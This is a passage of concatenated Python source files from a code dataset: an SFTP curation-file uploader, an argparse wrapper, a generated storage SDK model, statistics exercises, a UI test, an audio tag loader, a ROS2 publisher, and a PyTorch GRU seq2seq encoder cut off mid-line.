the remote key file, please check your configuration:\\n{err}\"\n )\n\n try:\n hostkeys = paramiko.HostKeys(filename=known_hosts)\n hkey = hostkeys[remote_server][\"ecdsa-sha2-nistp256\"]\n except FileNotFoundError as err:\n raise click.ClickException(\n f\"There was a problem loading the known hosts file, please check your configuration:\\n{err}\"\n )\n except KeyError as err:\n raise click.ClickException(f\"Host {str(err)} not found in known_hosts file.\")\n\n transport = paramiko.Transport((remote_server, 22))\n transport.connect(username=remote_user, pkey=key, hostkey=hkey)\n with paramiko.SFTPClient.from_transport(transport) as sftp:\n new_entries = [trembl_files, new_files, pep_files, sub_files]\n _send_new_entries(new_entries, sftp)\n for updates in [logfiles, pid_files, seq_files]:\n _send_updates(updates, sftp)\n transport.close()\n\n\ndef _send_updates(\n files: Union[LogFiles, PidFiles, SeqFiles], sftp: paramiko.SFTPClient\n) -> None:\n \"\"\"Sends update files to the remote FTP server.\n \n This function is used for logfiles, pid update files and seq update files\n (*.log, *.pid, *.seq) which can be transferred directly with no further\n processing needed.\n \n Args:\n files: list of CurationFiles objects (LogFiles, PidFiles, SeqFiles).\n sftp: paramiko SFTPClient object.\n \n \"\"\"\n if files:\n for f in files:\n localpath = str(f)\n remotepath = str(PurePosixPath(str(files.remote_dir), f.name))\n sftp.put(localpath=localpath, remotepath=remotepath)\n click.echo(f\"Sent {f.name} to {files.remote_dir}\")\n click.secho(f\"Sent all {str(files)} to {REMOTE_HOST_NAME}.\", fg=\"green\")\n click.echo(\"---\")\n else:\n click.echo(f\"No {str(files)} to send.\")\n click.echo(\"---\")\n\n\ndef _send_new_entries(\n files: List[Union[TrEMBLFiles, NewFiles, PepFiles, SubFiles]],\n sftp: paramiko.SFTPClient,\n) -> None:\n \"\"\"Sends new entries to the remote FTP server. \n \n \"New entries\" includes curated TrEMBL entries plus other new entries such\n as direct submissions. 
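    In this module that means the TrEMBLFiles, NewFiles, PepFiles and SubFiles\n    collections passed in via the files argument.\n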
These files must be concatenated into a single file\n    named \"allnew\" with a date stamp appended to the filename before transfer.\n\n    A temporary directory is used to make the \"allnew\" file.\n    \n    Args:\n        files: list of new-entry curation file objects (TrEMBLFiles,\n            NewFiles, PepFiles, SubFiles).\n        sftp: paramiko SFTPClient object\n    \"\"\"\n\n    if any(files):\n        date_string = datetime.date.today().strftime(\"%Y%m%d\")\n        # Remote directory is the same for all new files so just look at the\n        # first object in the list\n        remote_dir = files[0].remote_dir\n\n        with tempfile.TemporaryDirectory() as tmp:\n            # Concatenate new, sub and pep files to allnew\n            allnew = Path(tmp, f\"allnew_{date_string}.swp\")\n            for f in files:\n                if f:\n                    f.write_files(allnew, mode=\"a\")\n                    for file in f:\n                        click.echo(\n                            f\"Adding file {file.name} to concatenated file {allnew.name}\"\n                        )\n            # Transfer allnew file to remote server\n            localpath = str(allnew)\n            remotepath = str(PurePosixPath(str(remote_dir), allnew.name))\n            sftp.put(localpath=localpath, remotepath=remotepath)\n            click.echo(f\"Sent {allnew.name} to {remote_dir}\")\n        click.secho(f\"Sent all new files to {REMOTE_HOST_NAME}.\", fg=\"green\")\n        click.echo(\"---\")\n    else:\n        click.echo(\"No new files to send.\")\n        click.echo(\"---\")\n","sub_path":"sending/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":5108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309957422","text":"import sys\nfrom argparse import ArgumentDefaultsHelpFormatter, ArgumentParser\nfrom functools import partial\n\nfrom aku import add_option\n\n\nclass Aku(object):\n    def __init__(self, prog: str = None, usage: str = None, description: str = None):\n        super(Aku, self).__init__()\n        self.parser = ArgumentParser(\n            prog=prog, usage=usage, description=description,\n            formatter_class=ArgumentDefaultsHelpFormatter,\n        )\n        self._funcs = {}\n\n    def register(self, func):\n        self._funcs[func.__name__] = func\n        return func\n\n    def run(self, args=None, namespace=None):\n        self.delays = []\n\n        if len(self._funcs) == 1:\n            fn = list(self._funcs.values())[0]\n            add_option.add_function(\n                parser=self.parser, prefix=None, name=None,\n                annotation=fn, default=None, delays=self.delays,\n            )\n        else:\n            subparsers = self.parser.add_subparsers()\n            parsers = {\n                name: subparsers.add_parser(name)\n                for name, _ in self._funcs.items()\n            }\n            if len(sys.argv) > 1 and sys.argv[1] in parsers:\n                fn = self._funcs[sys.argv[1]]\n                add_option.add_function(\n                    parser=parsers[sys.argv[1]], prefix=None, name=None,\n                    annotation=fn, default=None, delays=self.delays,\n                )\n\n        args, _ = self.parser.parse_known_args(args, namespace)\n        self.raw_args = {k: v for k, v in vars(args).items()}\n        self.args = {k: v for k, v in vars(args).items()}\n\n        for dest, name, key in reversed(self.delays):\n            self.args[dest] = partial(self.args[dest], **{name: self.args[key]})\n            del self.args[key]\n\n            obj_dest = f'@{dest}'\n            if obj_dest in self.args:\n                del self.args[obj_dest]\n            if dest in self.raw_args and obj_dest in self.raw_args:\n                self.raw_args[dest] = self.raw_args[obj_dest]\n                del self.raw_args[obj_dest]\n\n        return fn(**self.args)\n\n\nApp = Aku\n","sub_path":"aku/aku.py","file_name":"aku.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407875873","text":"# coding: utf-8\n\n\"\"\"\n    Pure Storage FlashBlade REST 1.6 Python SDK\n\n    Pure Storage FlashBlade REST 1.6 Python SDK, developed by [Pure Storage, 
Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).\n\n OpenAPI spec version: 1.6\n Contact: info@purestorage.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nfrom pprint import pformat\nfrom six import iteritems\nimport re\n\n\nclass Space(object):\n \"\"\"\n NOTE: This class is auto generated by the swagger code generator program.\n Do not edit the class manually.\n \"\"\"\n\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'virtual': 'int',\n 'data_reduction': 'float',\n 'unique': 'int',\n 'snapshots': 'int',\n 'total_physical': 'int'\n }\n\n attribute_map = {\n 'virtual': 'virtual',\n 'data_reduction': 'data_reduction',\n 'unique': 'unique',\n 'snapshots': 'snapshots',\n 'total_physical': 'total_physical'\n }\n\n def __init__(self, virtual=None, data_reduction=None, unique=None, snapshots=None, total_physical=None):\n \"\"\"\n Space - a model defined in Swagger\n \"\"\"\n\n self._virtual = None\n self._data_reduction = None\n self._unique = None\n self._snapshots = None\n self._total_physical = None\n\n if virtual is not None:\n self.virtual = virtual\n if data_reduction is not None:\n self.data_reduction = data_reduction\n if unique is not None:\n self.unique = unique\n if snapshots is not None:\n self.snapshots = snapshots\n if total_physical is not None:\n self.total_physical = total_physical\n\n @property\n def virtual(self):\n \"\"\"\n Gets the virtual of this Space.\n usage in bytes\n\n :return: The virtual of this Space.\n :rtype: int\n \"\"\"\n return self._virtual\n\n @virtual.setter\n def virtual(self, virtual):\n \"\"\"\n Sets the virtual of this Space.\n usage in bytes\n\n :param virtual: The virtual of this Space.\n :type: int\n \"\"\"\n\n self._virtual = virtual\n\n @property\n def data_reduction(self):\n \"\"\"\n Gets the data_reduction of this Space.\n reduction of data\n\n :return: The data_reduction of this Space.\n :rtype: float\n \"\"\"\n return self._data_reduction\n\n @data_reduction.setter\n def data_reduction(self, data_reduction):\n \"\"\"\n Sets the data_reduction of this Space.\n reduction of data\n\n :param data_reduction: The data_reduction of this Space.\n :type: float\n \"\"\"\n\n self._data_reduction = data_reduction\n\n @property\n def unique(self):\n \"\"\"\n Gets the unique of this Space.\n physical usage in bytes\n\n :return: The unique of this Space.\n :rtype: int\n \"\"\"\n return self._unique\n\n @unique.setter\n def unique(self, unique):\n \"\"\"\n Sets the unique of this Space.\n physical usage in bytes\n\n :param unique: The unique of this Space.\n :type: int\n \"\"\"\n\n self._unique = unique\n\n @property\n def snapshots(self):\n \"\"\"\n Gets the snapshots of this Space.\n physical usage by snapshots, other than unique in bytes\n\n :return: The snapshots of this Space.\n :rtype: int\n \"\"\"\n return self._snapshots\n\n @snapshots.setter\n def snapshots(self, snapshots):\n \"\"\"\n Sets the snapshots of this Space.\n physical usage by snapshots, other than unique in bytes\n\n :param snapshots: The snapshots of this Space.\n :type: int\n \"\"\"\n\n self._snapshots = snapshots\n\n @property\n def total_physical(self):\n \"\"\"\n Gets the total_physical of this Space.\n total physical usage (including snapshots) in bytes\n\n :return: The total_physical of 
this Space.\n        :rtype: int\n        \"\"\"\n        return self._total_physical\n\n    @total_physical.setter\n    def total_physical(self, total_physical):\n        \"\"\"\n        Sets the total_physical of this Space.\n        total physical usage (including snapshots) in bytes\n\n        :param total_physical: The total_physical of this Space.\n        :type: int\n        \"\"\"\n\n        self._total_physical = total_physical\n\n    def to_dict(self):\n        \"\"\"\n        Returns the model properties as a dict\n        \"\"\"\n        result = {}\n\n        for attr, _ in iteritems(self.swagger_types):\n            value = getattr(self, attr)\n            if isinstance(value, list):\n                result[attr] = list(map(\n                    lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n                    value\n                ))\n            elif hasattr(value, \"to_dict\"):\n                result[attr] = value.to_dict()\n            elif isinstance(value, dict):\n                result[attr] = dict(map(\n                    lambda item: (item[0], item[1].to_dict())\n                    if hasattr(item[1], \"to_dict\") else item,\n                    value.items()\n                ))\n            else:\n                result[attr] = value\n\n        return result\n\n    def to_str(self):\n        \"\"\"\n        Returns the string representation of the model\n        \"\"\"\n        return pformat(self.to_dict())\n\n    def __repr__(self):\n        \"\"\"\n        For `print` and `pprint`\n        \"\"\"\n        return self.to_str()\n\n    def __eq__(self, other):\n        \"\"\"\n        Returns true if both objects are equal\n        \"\"\"\n        if not isinstance(other, Space):\n            return False\n\n        return self.__dict__ == other.__dict__\n\n    def __ne__(self, other):\n        \"\"\"\n        Returns true if both objects are not equal\n        \"\"\"\n        return not self == other\n","sub_path":"purity_fb/purity_fb_1dot6/models/space.py","file_name":"space.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"182828446","text":"# init does preparation work: check that the given value can be converted to an int\nclass MyNum(object):\n\n    def __init__(self, value):\n        try:\n            value = int(value)\n        except ValueError:\n            print(\"value is not convertible to int: \" + str(value))\n            exit(1)\n        self.val = value\n\n    def increment(self):\n        self.val = self.val + 1","sub_path":"trainingClass.py","file_name":"trainingClass.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"510751430","text":"## 2. Calculating differences ##\n\nfemale_diff = (10771-16280.5)/16280.5\n\nmale_diff = (21790-16280.5)/16280.5\n\n## 3. Updating the formula ##\n\nfemale_diff = (10771-16280.5)**2 / 16280.5\nmale_diff = (21790-16280.5)**2 / 16280.5\ngender_chisq = female_diff+male_diff\n\n## 4. Generating a distribution ##\n\nchi_squared_values = []\n\nfor i in range(1000):\n    Uvec = numpy.random.random((32561,))\n    Uvec[Uvec < .5] = 0\n    Uvec[Uvec >= .5] = 1\n    male_count = len(Uvec[Uvec==0])\n    female_count = len(Uvec[Uvec==1])\n    male_diff = (male_count-16280.5)**2 / 16280.5\n    female_diff = (female_count-16280.5)**2 / 16280.5\n    chi_squared = male_diff+female_diff\n    chi_squared_values.append(chi_squared)\n\nplt.hist(chi_squared_values)\n \n\n## 6. Smaller samples ##\n\nfemale_diff = (107.71-162.805)**2 / 162.805\nmale_diff = (217.90-162.805)**2 / 162.805\ngender_chisq = male_diff+female_diff\n\n## 7. 
Sampling distribution equality ##\n\nchi_squared_values = []\n\nfor i in range(1000):\n    Uvec = numpy.random.random((300,))\n    Uvec[Uvec<.5] = 0\n    Uvec[Uvec>=.5] = 1\n    male_count = len(Uvec[Uvec==0])\n    female_count = len(Uvec[Uvec==1])\n    male_diff = (male_count-150)**2 / 150\n    female_diff = (female_count-150)**2 / 150\n    chi_squared = male_diff+female_diff\n    chi_squared_values.append(chi_squared)\n    \nplt.hist(chi_squared_values)\n\n## 9. Increasing degrees of freedom ##\n\ndiffs = []\nobserved = [27816, 3124, 1039, 311, 271]\nexpected = [26146.5, 3939.9, 944.3, 260.5, 1269.8]\n\nfor i, obs in enumerate(observed):\n    exp = expected[i]\n    diff = (obs - exp) ** 2 / exp\n    diffs.append(diff)\n    \nrace_chisq = sum(diffs)\n\n## 10. Using SciPy ##\n\nfrom scipy.stats import chisquare\nimport numpy as np\n\nrace_obs = np.array([27816, 3124, 1039, 311, 271])\nrace_exp = np.array([26146.5, 3939.9, 944.3, 260.5, 1269.8])\n\nchisquare_value, race_pvalue = chisquare(race_obs,race_exp)","sub_path":"DataQuestArchive/probability-statistics-intermediate/Chi-squared tests-99.py","file_name":"Chi-squared tests-99.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"208301714","text":"\ndescription = 'Verify the user can rename a suite'\n\npages = ['login',\n         'index',\n         'project_suites']\n\ndef setup(data):\n    navigate(data.env.url)\n    login.do_login('admin', 'admin')\n    index.create_access_project('test_rename')\n\ndef test(data):\n    store('suite_name', 'suite_' + random('cccc'))\n    store('new_suite_name', data.suite_name + '_rename')\n    project_suites.add_suite(data.suite_name)\n    project_suites.verify_suite_exists(data.suite_name)\n    project_suites.rename_suite(data.suite_name, data.new_suite_name)\n    project_suites.verify_suite_exists(data.new_suite_name)\n\n\ndef teardown(data):\n    close()\n","sub_path":"projects/golem/tests/project_suites/rename_suite.py","file_name":"rename_suite.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"23643032","text":"import random\ndef tree_structure(baumtyp):\n    baumstruktur = random.randint(1,2)\n    if baumtyp == \"eiche\":\n        if baumstruktur == 1:\n            height = 3\n            for y in range(1,height+1):\n                yield (0,y,0), \"HOLZ\"\n            for x in range(-2,3):\n                for z in range(-2,3):\n                    yield (x,1+height,z), \"LAUB\"\n            for x in range(-1,2):\n                for z in range(-1,2):\n                    yield (x,y+height-1,z), \"LAUB\"\n        elif baumstruktur == 2:\n            height = 5\n            for y in range(1,height):\n                yield (0,y,0), \"HOLZ\"\n            for x in range(-2,3):\n                for z in range(-2,3):\n                    for y in range(2):\n                        yield (x,y+height,z), \"LAUB\"\n            for x in range(-1,2):\n                for z in range(-1,2):\n                    yield (x,y+height+1,z), \"LAUB\"\n            \n    #if 0 <= y-chunkpos[1] < chunksize\n","sub_path":"resources/Welten/structures/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"99536391","text":"import sys, os, wx, time, winsound, re\nimport multiprocessing\nimport copy\nimport globalVars\nfrom views import mkProgress\n\ndef is64Bit():\n\treturn sys.maxsize > 2 ** 32\n\n# Load the appropriate BASS dll for the runtime environment (32- vs 64-bit)\nif is64Bit():\n\tfrom pybass64 import pybass\n\tfrom pybass64 import pytags\nelse:\n\tfrom pybass import pybass\n\tfrom pybass import pytags\n\nclass dataDict():\n\tdef __init__ (self):\n\t\t# dataNo: (file path, file name, size, title, length, artist, album, album artist)\n\t\tself.dict = 
{}\n\t\tself.dataNo = 0\n\t# Add multiple files (file path list, destination list, corresponding list view, insert index = end)\n\tdef addFiles(self, flst, lst, lcObj, id=-1):\n\t\twx.CallAfter(self.addFilesCall, flst,lst,lcObj,id)\n\n\t# Add files (file path list, destination list, list view, insert index = end)\n\tdef addFilesCall(self, flst, lst, lcObj, id=-1):\n\t\t# Create the progress dialog\n\t\tprogress=mkProgress.Dialog()\n\t\tprogress.Initialize(_(\"ファイルを集めています...\"), _(\"読み込み中...\"))\n\t\tprogress.Show(False)\n\t\tglobalVars.app.Yield()\n\t\t# List of files to work on (file paths)\n\t\tpathList = []\n\t\t# Take the incoming list and split it into folders and files\n\t\tfor s in flst:\n\t\t\tif os.path.isfile(s) == True or re.search(\"^https?://.+\\..+\", s)!=None:\n\t\t\t\tpathList.append(s)\n\t\t\telse:\n\t\t\t\tself.appendDirList(pathList, s)\n\t\t# Add entries to the dictionary from the file path list built above\n\t\tself.appendDict(pathList, lst, lcObj, progress, id)\n\t\tprogress.Destroy()\n\t\twinsound.Beep(3000, 100)\n\t\twinsound.Beep(4000, 100)\n\t\twinsound.Beep(5000, 100)\n\n\n\t# Collect a file list from a directory path (file path list, directory path)\n\tdef appendDirList(self, lst, dir):\n\t\t# Walk the directory tree bottom-up\n\t\tdirObj = os.walk(dir, False)\n\t\tfor tp in dirObj:\n\t\t\tif len(tp[2]) != 0:\n\t\t\t\tfor file in tp[2]:\n\t\t\t\t\tf = tp[0] + \"\\\\\" + file\n\t\t\t\t\tlst.append(f)\n\n\t# Build the dictionary\n\tdef appendDict(self, paths, lst, lcObj, progress, id):\n\t\tif len(paths) == 0: return\n\t\tif id == -1: index =lcObj.GetItemCount() - 1\n\t\taddedItemCount = 0\n\t\titemCount = len(paths)\n\t\t# Split the list into chunks of 1000\n\t\tsplit = itemCount // 1000\n\t\tpathGroup = [] # the chunked lists\n\t\tfor i in range(0, split+1):\n\t\t\tif i == split:\n\t\t\t\tpathGroup.append(paths[i*1000:])\n\t\t\telse:\n\t\t\t\tpathGroup.append(paths[i*1000:(i+1)*1000])\n\n\t\tpl = multiprocessing.Pool()\n\t\tresult = [] # list that collects the async results\n\t\tfor path in pathGroup:\n\t\t\tresult.append(pl.apply_async(getFileInfoProcess, (path,)))\n\n\t\tfor o in result:\n\t\t\twhile o.ready() == False:\n\t\t\t\ttime.sleep(1)\n\t\t\tinfos = o.get()\n\t\t\tfor info in infos:\n\t\t\t\t# Write to the dict and the list, then increment dataNo\n\t\t\t\tif info == None:\n\t\t\t\t\titemCount -= 1\n\t\t\t\t\tcontinue\n\t\t\t\tself.dict[self.dataNo] = copy.deepcopy(info)\n\t\t\t\tlabel = self.dict[self.dataNo][3]\n\t\t\t\tif label == \"\": label = self.dict[self.dataNo][1]\n\t\t\t\tif id == -1:\n\t\t\t\t\tlst.appendF((self.dict[self.dataNo][0], self.dataNo))\n\t\t\t\t\tindex = lcObj.Append([label])\n\t\t\t\telse:\n\t\t\t\t\tindex = id+addedItemCount\n\t\t\t\t\tlst.addF(index, (self.dict[self.dataNo][0], self.dataNo))\n\t\t\t\t\tlcObj.InsertItem(index, label)\n\t\t\t\tlcObj.SetItemData(index, self.dataNo)\n\t\t\t\taddedItemCount += 1\n\t\t\t\tif addedItemCount%10 == 0:\tprogress.update(addedItemCount,_(\"読み込み中\")+\" \"+str(addedItemCount)+\"/\"+str(itemCount),itemCount)\n\t\t\t\tself.dataNo += 1\n\t\t\tglobalVars.app.Yield(True) # force-refresh the progress dialog\n\t\tpl.close() # shut down the worker pool\n\n\ndef getFileInfoProcess(paths):\n\tpybass.BASS_Init(0, 44100, 0, 0, 0)\n\tpytags.TAGS_SetUTF8(True)\n\t# Load the required plugins\n\tpybass.BASS_PluginLoad(b\"basshls.dll\", 0)\n\trtn = []\n\tfor path in paths:\n\t\thandle = pybass.BASS_StreamCreateFile(False, path, 0, 0, pybass.BASS_UNICODE)\n\t\tif handle == 0:\n\t\t\thandle = pybass.BASS_StreamCreateURL(path.encode(), 0, 0, 0, 0)\n\t\t\tif handle == 0:\n\t\t\t\tcontinue\n\t\t# Read file info\n\t\tfName = os.path.basename(path)\n\t\tif os.path.isfile(path):\n\t\t\tsize = os.path.getsize(path)\n\t\telse:\n\t\t\tsize = 0\n\t\ttitle = pytags.TAGS_Read(handle, b\"%TITL\").decode(\"utf-8\")\n\t\tlengthb = pybass.BASS_ChannelGetLength(handle, pybass.BASS_POS_BYTE)\n\t\tlength = 
pybass.BASS_ChannelBytes2Seconds(handle, lengthb)\n\t\tartist = pytags.TAGS_Read(handle, b\"%ARTI\").decode(\"utf-8\")\n\t\talbum = pytags.TAGS_Read(handle, b\"%ALBM\").decode(\"utf-8\")\n\t\talbumArtist = pytags.TAGS_Read(handle, b\"%AART\").decode(\"utf-8\")\n\t\tpybass.BASS_StreamFree(handle)\n\t\trtn.append((path, fName, size, title, length, artist, album, albumArtist))\n\tpybass.BASS_Free()\n\treturn tuple(rtn)\n","sub_path":"data_dict.py","file_name":"data_dict.py","file_ext":"py","file_size_in_byte":4709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326400713","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"setup.py: setuptools control.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nfiles = [\"*\"]\n\nsetup(\n name='iqa-one',\n version='0.1.1',\n packages=find_packages('src'),\n package_dir={'': 'src'},\n license='Apache 2.0',\n description='Messaging testing project',\n setup_requires=['pytest-runner'],\n tests_require=['pytest', 'mock', 'pytest-mock'],\n install_requires=[\n 'ansible',\n 'python-qpid-proton',\n 'amqcfg',\n 'dpath',\n 'optconstruct',\n 'docker',\n 'urllib3',\n 'kubernetes'\n ],\n url='https://github.com/enkeys/iqa-one',\n author='Dominik Lenoch',\n author_email='dlenoch@redhat.com'\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"318693080","text":"#!/usr/bin/env python3\nimport rclpy\nfrom rclpy.node import Node\n\nfrom std_msgs.msg import Bool\nfrom geometry_msgs.msg import Wrench\n\nclass WrenchSubPub(Node):\n\n def __init__(self):\n super().__init__('wrench_pub')\n self.isUp = True\n self.publisher_ = self.create_publisher(Wrench, '/catcher_force', 10)\n timer_period = 0.1 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n self.subscription = self.create_subscription(Bool,'/catcher_up', self.listener_callback,10)\n\n def listener_callback(self, msg):\n self.isUp = msg.data\n\n def timer_callback(self):\n msg = Wrench()\n msg.force.x = 0.0\n msg.force.y = 0.0\n msg.force.z = (60. 
* (float)(self.isUp == True)) + (-120.0 * (float)(self.isUp == False))\n        msg.torque.x = 0.0\n        msg.torque.y = 0.0\n        msg.torque.z = 0.0\n        self.publisher_.publish(msg)\n\n\ndef main(args=None):\n    rclpy.init(args=args)\n\n    node_ = WrenchSubPub()\n    rclpy.spin(node_)\n\n    node_.destroy_node()\n    rclpy.shutdown()\n\n\nif __name__ == '__main__':\n    main()","sub_path":"catcher_control/catcher_control/ctrl.py","file_name":"ctrl.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"479116230","text":"# -*- encoding: utf-8 -*-\r\n#'''\r\n#@file_name :network.py\r\n#@description :\r\n#@time :2020/02/13 12:47:27\r\n#@author :Cindy, xd Zhang \r\n#@version :0.1\r\n#'''\r\nimport os\r\nimport random\r\nimport torch\r\nimport time\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom transformer_sublayers import *\r\nfrom torch.nn.utils.rnn import pad_sequence\r\nfrom utils import *\r\nGlobal_device=\"cpu\"\r\nMAX_LENGTH=500\r\nWORD_EMBEDDING_DIM_NO_PRETRAIN=25\r\ndef save_checkpoint(handler):\r\n    epoch,start_iteration,emb,encoder,decoder,optimizer,config=handler\r\n    if config.model_type ==\"gru\":\r\n        save_directory = os.path.join(config.save_model_path,config.model_type,'L{}_H{}_'.format(config.n_layers,config.hidden_size)+config.attn)\r\n        if not os.path.exists(save_directory):\r\n            os.makedirs(save_directory)\r\n        save_path= os.path.join(save_directory,'Epo_{:0>2d}_iter_{:0>6d}.tar'.format(epoch,start_iteration))\r\n        torch.save({\r\n            'epoch': epoch,\r\n            'iteration': start_iteration,\r\n            'type':str(config.model_type),\r\n            'emb':emb.state_dict(),\r\n            'en': encoder.state_dict(),\r\n            'de': decoder.state_dict(),\r\n            'opt': optimizer.state_dict(),\r\n        }, save_path)\r\n    elif config.model_type ==\"trans\":\r\n        pass\r\n        # save_directory = os.path.join(config.save_model_path,config.model_type,'L{}_H{}'.format(config.n_layers,config.hidden_size))\r\n        # if not os.path.exists(save_directory):\r\n        #     os.makedirs(save_directory)\r\n        # save_path= os.path.join(save_directory,'Epo_{:0>2d}_iter_{:0>6d}.tar'.format(epoch,start_iteration))\r\n        # torch.save({\r\n        #     'epoch': epoch,\r\n        #     'iteration': start_iteration,\r\n        #     'type':str(config.model_type),\r\n        #     'en': encoder.state_dict(),\r\n        #     'de': decoder.state_dict(),\r\n        #     'en_opt': encoder_optimizer.state_dict(),\r\n        #     'de_opt': decoder_optimizer.state_dict(),\r\n        #     }, save_path) \r\n#=========================GRU seq2seq=================================\r\nclass EncoderRNN_noKG(nn.Module):\r\n    def __init__(self, hidden_size, embedding_size, n_layers=1, dropout=0):\r\n        super(EncoderRNN_noKG, self).__init__()\r\n        self.n_layers = n_layers\r\n        self.hidden_size = hidden_size\r\n        self.gru_History = nn.GRU(embedding_size, hidden_size, n_layers,\r\n                          dropout=(0 if n_layers == 1 else dropout), bidirectional=True,batch_first =False)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0_reverse)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0_reverse)\r\n        # hidden_kg=( num_layers * num_directions, batch,hidden_size)\r\n        # batch_first only affects the shape of output, not of hidden, so batch_first=False keeps the formats uniform\r\n        # self.W1=torch.nn.Linear(self.hidden_size*2, self.hidden_size, bias=True)\r\n        # self.PReLU1=torch.nn.PReLU()\r\n\r\n    def forward(self, input_history_seq_embedded,input_history_lengths,input_kg_seq,input_kg_lengths, unsort_idxs):\r\n        
unsort_idx_history,unsort_idx_kg=unsort_idxs\r\n        #history\r\n        # input_history_seq_embedded = self.embedding(input_history_seq)\r\n        input_history_seq_packed = torch.nn.utils.rnn.pack_padded_sequence(input_history_seq_embedded, input_history_lengths,batch_first=False)\r\n        his_outputs, hidden_his= self.gru_History(input_history_seq_packed, None)\r\n        his_outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(his_outputs,batch_first=False)\r\n        his_outputs=his_outputs.index_select(1,unsort_idx_history)\r\n        hidden_his=hidden_his.index_select(1,unsort_idx_history)\r\n        his_outputs = his_outputs[:, :, :self.hidden_size] + his_outputs[:, : ,self.hidden_size:]  # Sum bidirectional outputs (batch, 1, hidden)\r\n        return his_outputs, hidden_his\r\nclass EncoderRNN(nn.Module):\r\n    def __init__(self, hidden_size, embedding_size, n_layers=1, dropout=0):\r\n        super(EncoderRNN, self).__init__()\r\n        self.n_layers = n_layers\r\n        self.hidden_size = hidden_size\r\n        self.dropout = nn.Dropout(p=dropout)\r\n        self.gru_KG = nn.GRU(embedding_size, hidden_size, n_layers,\r\n                          dropout=(0 if n_layers == 1 else dropout), bidirectional=True,batch_first =False)\r\n        self.gru_History = nn.GRU(embedding_size, hidden_size, n_layers,\r\n                          dropout=(0 if n_layers == 1 else dropout), bidirectional=True,batch_first =False)\r\n        torch.nn.init.orthogonal_( self.gru_KG.weight_hh_l0)\r\n        torch.nn.init.orthogonal_( self.gru_KG.weight_hh_l0_reverse)\r\n        torch.nn.init.orthogonal_( self.gru_KG.weight_ih_l0)\r\n        torch.nn.init.orthogonal_( self.gru_KG.weight_ih_l0_reverse)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_hh_l0_reverse)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0)\r\n        torch.nn.init.orthogonal_( self.gru_History.weight_ih_l0_reverse)\r\n        # GRU output: (seq_len, batch, hidden*n_dir),\r\n        # hidden_kg=( num_layers * num_directions, batch,hidden_size)\r\n        # batch_first only affects output, not the shape of hidden, so batch_first=False keeps the formats uniform\r\n        self.W1=torch.nn.Linear(self.hidden_size*2, self.hidden_size, bias=True)\r\n        self.W2=torch.nn.Linear(self.hidden_size, self.hidden_size, bias=True)\r\n        # self.PReLU1=torch.nn.PReLU()\r\n        # self.PReLU2=torch.nn.PReLU()\r\n\r\n    def forward(self, input_history_seq,input_history_lengths,input_kg_seq,input_kg_lengths, unsort_idxs):\r\n        unsort_idx_history,unsort_idx_kg=unsort_idxs\r\n        #kg\r\n        #input_kg_seq_embedded [seq,batchsize, embeddingsize]\r\n        # input_kg_seq_embedded = self.embedding(input_kg_seq)\r\n        # input_kg_seq_embedded = input_kg_seq\r\n        # [seq, batch, embed_dim]\r\n        input_kg_seq= self.dropout(input_kg_seq)\r\n        input_kg_seq_packed = torch.nn.utils.rnn.pack_padded_sequence(input_kg_seq, input_kg_lengths,batch_first=False)\r\n        # GRU output: (seq_len, batch, hidden*n_dir),\r\n        # hidden_kg=( num_layers * num_directions, batch,hidden_size)\r\n        kg_outputs,hidden_kg=self.gru_KG(input_kg_seq_packed, None) \r\n        kg_outputs, _ = torch.nn.utils.rnn.pad_packed_sequence(kg_outputs,batch_first=False )\r\n        kg_outputs=kg_outputs.index_select(1,unsort_idx_kg)\r\n        hidden_kg=hidden_kg.index_select(1,unsort_idx_kg)\r\n\r\n        \r\n        kg_outputs = kg_outputs[:, :, :self.hidden_size] + kg_outputs[:, : ,self.hidden_size:]  # Sum bidirectional outputs ( batch,1, hidden)\r\n        \r\n        #history\r\n        # input_history_seq_embedded=input_history_seq\r\n        # input_history_seq_embedded = self.embedding(input_history_seq)\r\n        input_history_seq_packed = torch.nn.utils.rnn.pack_padded_sequence(input_history_seq, 